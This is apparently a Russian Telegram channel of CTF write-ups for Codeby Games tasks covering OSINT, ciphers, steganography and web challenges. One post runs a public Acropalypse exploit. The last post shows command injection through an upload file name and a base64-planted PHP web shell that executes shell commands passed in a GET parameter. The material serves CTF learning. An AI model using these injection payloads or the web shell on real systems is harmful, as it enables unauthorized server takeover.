Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
🎯 Друзья, у нас есть апрув от админов на райтапы! Я создал канал, куда будем публиковать райтапы кроме категорий квесты и Active Directory


От админов есть официальное добро:
https://t.me/codeby_games_chat/62380

Да, постепенно будем выкладывать задания с Киберколизея
Мы не против райтапов, кроме райтапов на задания из категорий Квесты и Active Directory


Будет очень полезно для всех!

Канал: @codeby2024ctf
Для публикации райтапов пишите: @freenameruuuu
Не стесняйтесь! Важен подход к задаче, а не ее решение!
👍21
#OSINT - Авиаперелет от @aleksulimov

1. грузим логин в https://intelx.io/tools?tab=username
2. находим блог со статьями на гитхабе
https://github.com/jamesbondan
3. один пользователь форкнул его себе
4. у него base64 лежит в описании и внутри еще один логин
5. опять грузим в intelx и находим аккаунт с Инстаграмом, смотрим фотки
6. делаем поиск по картинке, находим Nairobi
https://codeby.games

#codebygames
👍11🫡21🤬1
#Стеганография "Нейросеть" от @coffeedipso:

Шифр Бэкона
Заменяем маленькие буквы на A, большие на B
In TexT steGaNograpHY, the SECRet MEsSage Is tYPiCallY emBdded bY making suBtIE MOdiFIcATioNs
->
BA BAAB AAABABAAAAABB AAA BBBBAA BBABAAA BA ABBABAAAB AABAAAA AB AAAAAA AABABB BBAABBABBAABA
->
Получаем флаг

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
😨14👍7🤔51👎1
#Криптография "Часовщик" от @coffeedipso:

переводим код
[🕔 🕖 🕕 🕖 🕔 🕗 🕔 🕘 🕔 🕕 🕖 🕔 🕙 🕒 🕓 🕐 🕘 🕗 🕘 🕖 🕖 🕚 🕘 🕗 🕓 🕐 🕘 🕐 🕓 🕒 🕖 🕚 🕘 🕗 🕒 🕓 🕖 🕚 🕗 🕗 🕓 🕓 🕗 🕒 🕗 🕚 🕙 🕔 ]


из задания в стикеры, получаем часы, далее из часов в 10-ную, делим на пары, далее 12 - 16 - ASCII

57 - 43 -
67 - 4F -
58 - 44 -
59 - 45 -
56 - 42 -
75 - 59 -
A3 - 7B -
41 - 31 -
98 - 74 -
97 - 73 -
7B - 5F -
98 - 74 -
41 - 31 -
91 - 6D -
43 - 33 -
7B - 5F -
98 - 74 -
34 - 28 -
7B - 5F -
88 - 68 -
44 - 34 -
83 - 63 -
8B - 6B -
A5 - 7D -
Расшифровываем и
Получаем флаг

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🤯5😱5🤣21
#OSINT ДаВинчи от @freenameruuuu

Имеем на входе фразу:
В тайных галереях творчества Леонардо да Винчи каждая линия его холстов становится частью удивительного Кодекса или собрания, пронизанного тайными знаками. Леонардо, подобно современному Атланту, несет бремя искусства, науки и загадок, встречающихся с современными технологиями сейчас.

Ищем ДаВинчи и Атланты. Находим http://www.vinci.ru/glava19.html «АТЛАHТИЧЕСКИЙ КОДЕКС»

Идем в вики, находим информацию где хранится сам кодекс - Амброзианская библиотека.

Идет на сайт самой библиотеки ambrosiana.it, но этот флаг нам не подходит. Видимо нужно найти сам кодекс

Ищем на сайте библиотеки codex-atlanticus, находим https://www.ambrosiana.it/en/discover/codex-atlanticus-leonardo-da-vinci/
Видим, что есть отцифрованый кодекс.
Переходим на страницу кодекса, дальше думайте сами!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
11🫡2
Друзья!

На сегодня наверное все. Завтра продолжим и выложим решения, которые нам уже скинули! Их много и они очень интересные!

Кидайте ваши решения, не стесняйтесь. Главное не решение, а подход к нему!

Всем хорошего отдыха, кибер-котлеты ❤️❤️❤️

с 8 утра по Москве начнем публиковать райтапы!
💊125💩2
Утро доброе, кибер-котлеты! Сегодня вас ждет множество райтапов и полезного контента, которые мы будем публиковать каждыве два часа!

Если у вас есть решение, пишите нам скорей @freenameruuuu и @coffeedipso и мы их обязательно опубликуем!
👍7🖕21
Осторожнее с доверием от @Vampir_Gosha

Известно, что сисадмин получил скриншот, который был обрезан (так как есть оригинал, на котором затерта информация).

На скриншоте видим, что ОС Windows, значит использовались Ножницы.

Путем недолгого поиска "ножницы windows vulnetrable" находим свежую CVE-2023-28303.

Путем еще одного простого поиска "cve-2023-28303 exploit" находим эксплойт на Github.
https://github.com/frankthetank-music/Acropalypse-Multi-Tool

Скаживаем репозиторий, импортируем недостающие библиотеки и запускаем эксплойт python ./gui.py

Далее выбираем RestoreTool, подгружаем обрезанный скриншот, указываем размеры, взяв их из большого изображения, и получаем обрезанную часть, где видим банковскую карту!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍101
😁8👎2🔥1
#OSINT Авиаперелет от @scars_on_the_hands

С помощью бота ищем все сайты для никнейма jamesonbondan.

Находим его страничку GitHub. (огого как не очевидно!)
Среди подписчиков пользователя находится funofacurichtasks
Если перейти в его репозиторий можно найти base64 сообщение.

Опять запускаем поиск. Ищем соцсеть, в которую обычно выкладывают фотки с путешествий. По нику и находим инстаграм профиль.
На страничке видим две фотографии.
Дата обеих фотографий - 19 января.

Картинка со столбом сделана в аэропорту Мадагаскара - Антананариву (сайт аэропорта находится по поиску фото).

Второе фото взято с сайта JetPhotos и дает нам информацию о компании авиаперевозчика -> Kenya Airways.
Найдем все вылеты из указанного аэропорта у данной комании!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤓51
Друзья! Кто решил ETL файлы? Не стесняемся, присылайте нам ваши решения! Главное подход к задаче, потому каждый из них уникален!

Для публикации райтапов пишите: @freenameruuuu и @coffeedipso
2
#Криптография Холмы от @andreika47

Дана матрица с номерами и строка с алфавитом

-------------------------
|76 |101|115|116|101|114|
-------------------------
|32 |83 |97 |110|100|101|
-------------------------
|114|115|32 |115|104|111|
-------------------------
|117|108|100|32 |104|101|
-------------------------
|108|112|32 |121|111|117|
-------------------------
|32 |58 |41 |41 |41 |42 |
-------------------------

KLZCOUKTVOUWUKDOBGZVJIIIRGVHXCRQUCNOX_IBBL

Пробуем декодировать матрицу в ascii. Получаем имя и фамилю криптографа, который знаменит шифром Хилла.

Гуглим , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.

Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица.

Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания.

Подобрав правильный алфавит (нам нужны буквы латиницы и символ _) получаем ответ!

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3💊1
#WEB таск "Печенье" от @ErikPupOn:

Реализация через Python!

import requests
url = "http://62.173.140.174:46002/"
session = requests.Session()
cookies_data = {
"cookies": "[Sugar cookies, Oatmeal cookies, Crackers cookies]",
"amount": '[1, 5, 2]'
}
response = session.get(url, cookies=cookies_data)
print(response.text)
session.close()


🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬12🌚3
#OSINT от @scars_on_the_hands

В 1983 году в одной из стран произошел ужасный инцидент. Говорят, что известный актер был замешан в этом инциденте, но точную дату его рождения нам и предстоит узнать.


По вложенной фотографии с помощью Google Lens можно найти статью, в которой упоминается много раз страна Грузия.

По поиску в интернете 1983 Грузия ужасная катастрофа выдается случай с захватом самолета.

Воспользуемся помощью Chat GPT и попросим его выдать всех знаменитостей, вовлеченных в данный инцидент.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
#OSINT Перелёты от @Zer0_Tw0_02

~ По заданию говориться о каком-то произошедшем инциденте в 1983г и участвовавшем в нём актёре, дату рождения которого нам и предстоит узнать.

С помощью любой поисковой системы, либо Нейро от Яндекса ищем информацию по запросу "Мировые инциденты 1983г", и открыв Список террористических актов 1983 года можем найти Попытку угона Ту-134 в ноябре 1983 года, среди которых в числе причастных имеется нужное нам лицо. Остаётся лишь дело за малым - найти его дату рождения.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1
#OSINT Анимешник от @Zer0_Tw0_02

~ По заданию говориться о друге-анимешнике, который потерялся где-то на пару часов в аэропорту Токио 17 января 2024 на самолёте с бортовым номером серии XX-XXX

Первым делом ищем где взять архивные вылеты/прилеты аэропортов Токио и натыкаемся на сайт, на котором выбираем TOKYO NARITA INTERNATIONAL AIRPORT, после чего находим Список стран и их префиксов регистрации воздушных судов и перебираем по дате каждый подходящий рейс, чтобы изучить бортовые номера самолётов.
Либо выключаем мозг и читаем прям через слово, и сложив пазл воедино "Самолёт+Аниме" логически додумываем либо это Аниме-рейс, либо скин. Используя любой поисковик находим самолёты серии Pokemon Jet и там уже лежит заветный борт.

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍121
Рекомендательный контент!
Фильм "Хакеры"

Команда университетских компьютерных гениев вступает в войну с сетевым злодеем
История про хакеров, которые случайно взламывают защиту корпорации «Эллингсон» и подключаются к схеме хищения средств, искусно замаскированной под компьютерный вирус.

https://www.afisha.ru/movie/hakery-165867/
👍7🔥2💔2
#WEB "Архиватор" от @IFed00
Открываем задание, видим одностраничник (index.php) который позволяет загружать файлы и выдаёт zip архив с ними. Имя архива рандомизируется, а сами архивы лежат в /upload/.

После изучения понимаем, что единственная ручка за которую можно дёргать - это имя посылаемого файла. Мой мощный тиммейт обнаружил, что имя используется в bash'e подменив его (с помощью burp proxi) на ; sleep 10; и получив соответствующую задержку.
Соответственно пытаемся передать для архивации какой-то более интересный путь ("/" если готовы качать потенциальные гигабайты в виде архивированной системы) и... архив не создаётся( Видимо внутренняя ошибка, о которой сайт нам не сообщает. Собственно решение на поверхности: $(pwd) а потом и $(cd .. && pwd) Warning: potential >10MB .zip

Таким образом получаем доступ к исходному коду index.php, который подтверждает все догадки: имя файла используется как часть команды bash. Однако перед этим сервер пытается переместить наш файл из временного хранилища со случайными именем в /uploads/*filename* и если имя содержит запрещённые символы (для имён файлов) выполнение прерывается. Самый интересный из запрещённых символов это конечно "/" который как раз позволил бы нам "походить" по системы и поискать флаг.

Отсюда решения могут быть разными, вот моё:
загрузим простенький бэкдор на php, который будет исполнять команду переданную через GET-запрос c параметром cmd в bash и выводить ответ:
<?php echo shell_exec($_GET('cmd') ?>
Чтобы не возиться с экранированием символов закодируем его в base64 и отправим на архивацию файл со следующим "именем":
$(cd .. && echo 'base64blob' | base64 --decode > backdoor.php)
Теперь в директории с правами выполнения у нас есть свой человечек...

Немного /backdoor.php?cmd=ls и в /var/www/ обнаруживаем flag.txt! Дальше cat /var/www/flag.txt и наконец rm backdoor.php

🚩https://codeby.games

#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
13👏2💊2🤯1